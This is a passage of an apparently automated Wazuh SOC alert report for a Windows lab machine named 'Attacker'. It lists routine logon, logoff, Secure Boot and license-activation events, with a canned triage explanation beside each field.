impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x1e7fd31
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x1e7fc0d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.183+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.183+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.79347
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-TPM-WMI
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {7d5387b0-cbe0-11da-a94d-0800200c9a66}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1796
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:38:01.9174262Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2887
Incremental log record number – handy for timeline order.

data.win.system.processID:  12516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12400
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The Secure Boot update failed to update a Secure Boot variable with error Secure Boot is not enabled on this machine.. For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hResult:  -2147020471
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.323+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.323+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.80933
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:24.5862980Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43458
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  11484
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x1E7FD31 Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x1e7fd31
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.460+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.460+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.83399
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:24.6073282Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43459
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  11484
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x1E7FC0D Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x1e7fc0d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.580+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.580+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.85865
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8198
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:51.9596326Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2363
Incremental log record number – handy for timeline order.

data.win.system.processID:  4720
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.770+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.770+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.88161
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:27.0631332Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43460
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10856
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.981+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.981+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.95498
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8198
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:56.4510372Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2365
Incremental log record number – handy for timeline order.

data.win.system.processID:  11828
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

